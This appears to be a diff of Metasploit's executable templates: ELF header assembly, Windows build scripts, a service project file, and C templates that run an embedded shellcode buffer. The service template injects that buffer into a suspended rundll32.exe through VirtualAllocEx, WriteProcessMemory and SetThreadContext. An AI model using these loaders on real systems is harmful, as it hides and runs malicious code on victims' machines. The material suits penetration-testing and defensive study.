-  dw    0x3400                   ;   e_ehsize
-  dw    0x2000                   ;   e_phentsize
-  dw    0x0100                   ;   e_phnum
-  dw    0                        ;   e_shentsize
-  dw    0                        ;   e_shnum
-  dw    0                        ;   e_shstrndx
-
-ehdrsize equ  $ - ehdr
-
-phdr:                            ; Elf32_Phdr
-
-  dd    0x01000000               ;   p_type       = pt_load
-  dd    0                        ;   p_offset
-  dd    0x00100000               ;   p_vaddr
-  dd    0x00100000               ;   p_paddr
-  dd    0xefbeadde               ;   p_filesz
-  dd    0xefbeadde               ;   p_memsz
-  dd    0x07000000               ;   p_flags      = rwx
-  dd    0x00000100               ;   p_align
-
-phdrsize equ  $ - phdr
-
-_start:
@@ -1,37 +0,0 @@
-; build with:
-;   nasm elf_ppce500v2_template.s -f bin -o template_ppce500v2_linux.bin
-
-BITS 32
-ehdr:                            ; Elf32_Ehdr
-  db    0x7F, "ELF", 1, 2, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
-  dw    0x1400                   ;   e_machine    = PPC
-  dd    0x01000000               ;   e_version
-  dd    0x54100000               ;   e_entry
-  dd    0x34000000               ;   e_phoff
-  dd    0                        ;   e_shoff
-  dd    0                        ;   e_flags
-  dw    0x3400                   ;   e_ehsize
-  dw    0x2000                   ;   e_phentsize
-  dw    0x0100                   ;   e_phnum
-  dw    0                        ;   e_shentsize
-  dw    0                        ;   e_shnum
-  dw    0                        ;   e_shstrndx
-
-ehdrsize equ  $ - ehdr
-
-phdr:                            ; Elf32_Phdr
-
-  dd    0x01000000               ;   p_type       = pt_load
-  dd    0                        ;   p_offset
-  dd    0x00100000               ;   p_vaddr
-  dd    0x00100000               ;   p_paddr
-  dd    0xefbeadde               ;   p_filesz
-  dd    0xefbeadde               ;   p_memsz
-  dd    0x07000000               ;   p_flags      = rwx
-  dd    0x00000100               ;   p_align
-
-phdrsize equ  $ - phdr
-
-_start:
@@ -1,34 +0,0 @@
-; build with:
-;   nasm elf_zarch_template.s -f bin -o template_zarch_linux.bin
-
-BITS 64
-
-
-ehdr:                            ; Elf32_Ehdr
-  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
-  dw    0x1600                   ;   e_machine    = ZARCH
-  dd    0x01000000               ;   e_version
-  dq    0x7810000000000000       ;   e_entry
-  dq    0x4000000000000000       ;   e_phoff
-  dq    0                        ;   e_shoff
-  dd    0                        ;   e_flags
-  dw    0x4000                   ;   e_ehsize
-  dw    0x3800                   ;   e_phentsize
-  dw    0x0100                   ;   e_phnum
-  dw    0                        ;   e_shentsize
-  dw    0                        ;   e_shnum
-  dw    0                        ;   e_shstrndx
-
-phdr:                            ; Elf32_Phdr
-  dd    0x01000000               ;   p_type       = PT_LOAD
-  dd    0x07000000               ;   p_flags      = rwx
-  dq    0                        ;   p_offset
-  dq    0x0010000000000000       ;   p_vaddr
-  dq    0x0010000000000000       ;   p_paddr
-  dq    0xDEADBEEF               ;   p_filesz
-  dq    0xDEADBEEF               ;   p_memsz
-  dq    0x0000100000000000       ;   p_align
-
-_start:
@@ -1,19 +1,10 @@
 # PE Source Code
 This directory contains the source code for the PE executable templates.

-## Building
-Use the provided `build_all.ps1` script from within the Visual Studio developer
-console. The script requires that the `%VCINSTALLDIR%` environment variable be
-defined (which it should be by default). By default it builds all templates for
-both x86 and x64, then moves the outputs into the correct folder.
-
-```powershell
-# build everything
-.\build_all.ps1
-
-# build only x86
-.\build_all.ps1 -Architectures x86
-
-# build only EXE templates
-.\build_all.ps1 -Templates exe,exe_service
-```
+## Building DLLs
+Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+developer console. The batch file requires that the `%VCINSTALLDIR%` environment
+variable be defined (which it should be by default). The build script will
+create both the x86 and x64 templates before moving them into the correct
+folder. The current working directory when the build is run must be the source
+code directory (`pe`).
@@ -1,230 +0,0 @@
-<#
-.SYNOPSIS
-    Build all PE executable and DLL templates for Metasploit.
-
-.DESCRIPTION
-    Compiles x86 and x64 variants of the EXE, service EXE, DLL, GDI+ DLL, and
-    mixed-mode DLL templates using the MSVC toolchain. After linking, the EXE
-    templates are patched to lower the minimum subsystem version so they can run
-    on legacy Windows (NT 4.0+ for x86, Server 2003+ for x64). Modern MSVC
-    linkers enforce a floor of 5.01/5.02 which is too high for those targets.
-
-.PARAMETER Architectures
-    Which architectures to build. Defaults to both x86 and x64.
-
-.PARAMETER Templates
-    Which templates to build. Defaults to all of them.
-
-.EXAMPLE
-    .\build_all.ps1
-    .\build_all.ps1 -Architectures x86
-    .\build_all.ps1 -Templates exe,exe_service
-#>
-
-param(
-    [ValidateSet('x86', 'x64')]
-    [string[]]$Architectures = @('x86', 'x64'),
-
-    [ValidateSet('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')]
-    [string[]]$Templates = @('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')
-)
-
-$ErrorActionPreference = 'Stop'
-$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
-$OutputDir = Resolve-Path (Join-Path $ScriptDir '..\..')
-
-# Each entry defines only what varies per template. The build function handles
-# the common logic: calling cl, optional 256KiB variant, PE version patching.
-#
-#   Dir          - subdirectory containing the source
-#   OutputFmt    - output filename format string, {0} is replaced with the architecture
-#   Source       - source file passed to cl
-#   ClFlags      - flags passed to cl (before /link)
-#   LinkLibs     - libraries passed to the linker (after /link)
-#   LinkRes      - optional .res file to link
-#   EntryPoint   - /entry value
-#   NoDefaultLib - if set, pass /NODEFAULTLIB to the linker
-#   RcArgs       - optional resource compiler arguments (run before cl)
-#   PatchVersion - if set, patch the PE subsystem version after linking
-#
-# DLL templates automatically get a 256KiB payload variant built alongside the
-# standard size. This is determined by the output extension, not a per-template flag.
-$BuildDefs = [ordered]@{
-    exe = @{
-        Dir          = 'exe'
-        OutputFmt    = 'template_{0}_windows.exe'
-        Source       = 'template.c'
-        ClFlags      = @('/GS-')
-        LinkLibs     = @('kernel32.lib')
-        EntryPoint   = 'main'
-        NoDefaultLib = $true
-        PatchVersion = $true
-    }
-    exe_service = @{
-        Dir          = 'exe_service'
-        OutputFmt    = 'template_{0}_windows_svc.exe'
-        Source       = 'template.c'
-        ClFlags      = @('/GS-', '/DBUILDMODE=2')
-        LinkLibs     = @('advapi32.lib', 'kernel32.lib')
-        EntryPoint   = 'main'
-        NoDefaultLib = $true
-        PatchVersion = $true
-    }
-    dll = @{
-        Dir          = 'dll'
-        OutputFmt    = 'template_{0}_windows.dll'
-        Source       = 'template.c'
-        ClFlags      = @('/LD', '/GS-', '/DBUILDMODE=2')
-        LinkLibs     = @('kernel32.lib')
-        LinkRes      = 'template.res'
-        EntryPoint   = 'DllMain'
-        RcArgs       = @('/v', 'template.rc')
-    }
-    dll_gdiplus = @{
-        Dir          = 'dll_gdiplus'
-        OutputFmt    = 'template_{0}_windows_dccw_gdiplus.dll'
-        Source       = '../dll/template.c'
-        ClFlags      = @('/LD', '/GS-', '/DBUILDMODE=2', '/I', '.', '/FI', 'exports.h')
-        LinkLibs     = @('kernel32.lib')
-        LinkRes      = 'template.res'
-        EntryPoint   = 'DllMain'
-        RcArgs       = @('/v', '/fo', 'template.res', '../dll/template.rc')
-    }
-    dll_mixed_mode = @{
-        Dir          = 'dll_mixed_mode'
-        OutputFmt    = 'template_{0}_windows_mixed_mode.dll'
-        Source       = 'template.cpp'
-        ClFlags      = @('/CLR', '/LD', '/GS-', '/I', '..\dll', '/DBUILDMODE=2')
-        LinkLibs     = @('mscoree.lib', 'kernel32.lib')
-        EntryPoint   = 'DllMain'
-    }
-}
-
-if (-not $env:VCINSTALLDIR) {
-    Write-Error 'VCINSTALLDIR is not set. Run this script from a Visual Studio Developer Command Prompt.'
-    exit 1
-}
-
-function Invoke-VCVars {
-    param([string]$Arch)
-    # vcvarsall.bat no-ops if VSCMD_VER is already set, so clear its state
-    # flags before re-running. Otherwise the second arch silently inherits
-    # the first arch's toolchain and produces wrong-architecture binaries.
-    foreach ($v in 'VSCMD_VER', 'VSCMD_ARG_TGT_ARCH', 'VSCMD_ARG_HOST_ARCH') {
-        [System.Environment]::SetEnvironmentVariable($v, $null, 'Process')
-    }
-    $vcvars = Join-Path $env:VCINSTALLDIR 'Auxiliary\Build\vcvarsall.bat'
-    cmd /c "`"$vcvars`" $Arch >nul 2>&1 && set" 2>&1 | ForEach-Object {
-        if ($_ -match '^([^=]+)=(.*)$') {
-            [System.Environment]::SetEnvironmentVariable($matches[1], $matches[2], 'Process')
-        }
-    }
-}
-
-function Invoke-Cl {
-    param(
-        [string[]]$ClFlags,
-        [string]$Source,
-        [string]$OutputName,
-        [string[]]$LinkLibs,
-        [string]$LinkRes,
-        [string]$EntryPoint,
-        [switch]$NoDefaultLib
-    )
-    $clArgs = $ClFlags + @($Source, "/Fe:$OutputName", '/link') + $LinkLibs
-    if ($LinkRes) { $clArgs += $LinkRes }
-    $clArgs += @("/entry:$EntryPoint", '/subsystem:WINDOWS')
-    if ($NoDefaultLib) { $clArgs += '/NODEFAULTLIB' }
-    & cl @clArgs
-    if ($LASTEXITCODE -ne 0) { Write-Error "cl failed for $OutputName" }
-}
-
-function Set-PEVersion {
-    param(
-        [string]$Path,
-        [int]$Major,
-        [int]$Minor
-    )
-    $bytes = [System.IO.File]::ReadAllBytes($Path)
-    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
-    if ([System.Text.Encoding]::ASCII.GetString($bytes, $peOffset, 4) -ne "PE`0`0") {
-        Write-Error "$Path is not a valid PE file"
-        return
-    }
-    # PE optional header starts at peOffset + 24. Field offsets from its start:
-    #   +40: MajorOperatingSystemVersion (uint16)
-    #   +42: MinorOperatingSystemVersion (uint16)
-    #   +48: MajorSubsystemVersion      (uint16)
-    #   +50: MinorSubsystemVersion      (uint16)
-    # These offsets are identical for PE32 and PE32+.
-    $opt = $peOffset + 24
-    $verBytes = [BitConverter]::GetBytes([uint16]$Major)
-    $minBytes = [BitConverter]::GetBytes([uint16]$Minor)
-    $bytes[$opt + 40] = $verBytes[0]; $bytes[$opt + 41] = $verBytes[1]
-    $bytes[$opt + 42] = $minBytes[0]; $bytes[$opt + 43] = $minBytes[1]
-    $bytes[$opt + 48] = $verBytes[0]; $bytes[$opt + 49] = $verBytes[1]
-    $bytes[$opt + 50] = $minBytes[0]; $bytes[$opt + 51] = $minBytes[1]
-    [System.IO.File]::WriteAllBytes($Path, $bytes)
-    Write-Host "  Patched OS and subsystem version to ${Major}.${Minor}"
-}
-
-function Build-Template {
-    param([string]$Arch, [string]$Name)
-    $def = $BuildDefs[$Name]
-
-    Push-Location (Join-Path $ScriptDir $def.Dir)
-    try {
-        if ($def.RcArgs) {
-            & rc @($def.RcArgs)
-            if ($LASTEXITCODE -ne 0) { throw "rc failed for $Name ($Arch)" }
-        }
-
-        $outName = $def.OutputFmt -f $Arch
-        Invoke-Cl -ClFlags $def.ClFlags -Source $def.Source -OutputName $outName `
-                  -LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-                  -EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
-
-        if ($Name -like 'dll*') {
-            $outName256 = $outName -replace '(\.\w+)$', '.256kib$1'
-            Invoke-Cl -ClFlags ($def.ClFlags + '/DSCSIZE=262144') -Source $def.Source -OutputName $outName256 `
-                      -LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-                      -EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
-        }
-    } finally { Pop-Location }
-
-    if ($def.PatchVersion) {
-        $outPath = Join-Path $ScriptDir "$($def.Dir)\$outName"
-        if ($Arch -eq 'x86') {
-            Set-PEVersion -Path $outPath -Major 4 -Minor 0
-        } else {
-            Set-PEVersion -Path $outPath -Major 5 -Minor 2
-        }
-    }
-}
-
-# Build each requested template for each architecture
-foreach ($arch in $Architectures) {
-    Write-Host "`n=== Configuring for $arch ===" -ForegroundColor Cyan
-    Invoke-VCVars $arch
-
-    foreach ($tmpl in $Templates) {
-        Write-Host "`nBuilding: $tmpl ($arch)" -ForegroundColor Green
-        Build-Template -Arch $arch -Name $tmpl
-    }
-}
-
-# Clean intermediate files and move outputs
-Write-Host "`n=== Cleaning up ===" -ForegroundColor Cyan
-Get-ChildItem $ScriptDir -Recurse -File |
-    Where-Object { $_.Extension -in '.obj', '.res', '.exp', '.lib' } |
-    Remove-Item -Force
-
-Write-Host "`n=== Moving outputs to $OutputDir ===" -ForegroundColor Cyan
-Get-ChildItem $ScriptDir -Recurse -File |
-    Where-Object { $_.Extension -in '.exe', '.dll' } |
-    ForEach-Object {
-    Move-Item $_.FullName (Join-Path $OutputDir $_.Name) -Force
-    Write-Host "  $($_.Name)"
-}
-
-Write-Host "`nDone." -ForegroundColor Green
@@ -0,0 +1,7 @@
+@echo off
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  build.bat
+  popd
+)
@@ -0,0 +1,15 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rc /v template.rc
+cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.dll ..\..\..
@@ -0,0 +1,15 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rc /v /fo template.res ../dll/template.rc
+cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.exp *.lib *.res *.obj
+move *.dll ..\..\..
@@ -0,0 +1,14 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj
+move *.dll ..\..\..
@@ -0,0 +1,26 @@
+
+Microsoft Visual Studio Solution File, Format Version 10.00
+# Visual C++ Express 2008
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
+		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,343 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="9.00"
+	Name="service"
+	ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
+	RootNamespace="service"
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+		<Platform
+			Name="x64"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Debug|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
+				RuntimeLibrary="0"
+				BufferSecurityCheck="false"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+				CallingConvention="2"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				OutputFile="../../../../service.exe"
+				LinkIncremental="1"
+				GenerateManifest="false"
+				GenerateDebugInformation="false"
+				SubSystem="2"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
+				RuntimeLibrary="0"
+				BufferSecurityCheck="false"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+				CallingConvention="2"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				OutputFile="../../../../template_x64_windows_svc.exe"
+				LinkIncremental="1"
+				GenerateManifest="false"
+				GenerateDebugInformation="false"
+				SubSystem="2"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\service.c"
+				>
+			</File>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
@@ -1,28 +1,16 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>

-#define SCSIZE 8192
+#define PAYLOAD_SIZE	8192

 char cServiceName[32] = "SERVICENAME";

-char bPayload[SCSIZE] = "PAYLOAD:";
+char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";

 SERVICE_STATUS ss;

 SERVICE_STATUS_HANDLE hStatus = NULL;

-#if BUILDMODE == 2
-/* hand-rolled bzero allows us to avoid including ms vc runtime */
-void inline_bzero(void *p, size_t l)
-{
-	BYTE *q = (BYTE *)p;
-	size_t x = 0;
-	for (x = 0; x < l; x++)
-		*(q++) = 0x00;
-}
-
-#endif
-
 /*
 *
 */
@@ -46,9 +34,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	PROCESS_INFORMATION pi;
 	LPVOID lpPayload = NULL;

-	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
-	inline_bzero( &si, sizeof(STARTUPINFO) );
-	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );
+	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
+	ZeroMemory( &si, sizeof(STARTUPINFO) );
+	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );

 	si.cb = sizeof(STARTUPINFO);

@@ -59,7 +47,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

 	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
-
+  
 	if ( hStatus )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
@@ -69,30 +57,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
-
+		  
 			GetThreadContext( pi.hThread, &Context );
-
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+		  
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
 #ifdef _WIN64
-				Context.Rip = (ULONG_PTR)lpPayload;
+				Context.Rip = (DWORD64)lpPayload;
 #else
-				Context.Eip = (ULONG_PTR)lpPayload;
+				Context.Eip = (DWORD)lpPayload;
 #endif
 				SetThreadContext( pi.hThread, &Context );
 			}

 			ResumeThread( pi.hThread );
-
+			
 			CloseHandle( pi.hThread );
-
+		  
 			CloseHandle( pi.hProcess );
 		}
-
+		
 		ServiceHandler( SERVICE_CONTROL_STOP );
-
+		
 		ExitProcess( 0 );
 	}
 }
@@ -100,13 +88,12 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 /*
 *
 */
-void main()
+int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
 {
-	SERVICE_TABLE_ENTRY st[] =
-		{
-			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
-			{ NULL, NULL }
-		};
-	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
-	return;
+	SERVICE_TABLE_ENTRY st[] = 
+    { 
+        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
+        { NULL, NULL } 
+    };
+	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
 }
@@ -1,11 +1,11 @@
-#include <windows.h>
+#include <stdio.h>

 #define SCSIZE 4096
-char bPayload[SCSIZE] = "PAYLOAD:";
+char payload[SCSIZE] = "PAYLOAD:";

-void main() {
-	DWORD dwOldProtect;
-	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
-	(*(void (*)()) bPayload)();
-	return;
+char comment[512] = "";
+
+int main(int argc, char **argv) {
+	(*(void (*)()) payload)();
+	return(0);
 }
@@ -0,0 +1,32 @@
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Architecture: x64
+;
+; Assemble and link with the following command:
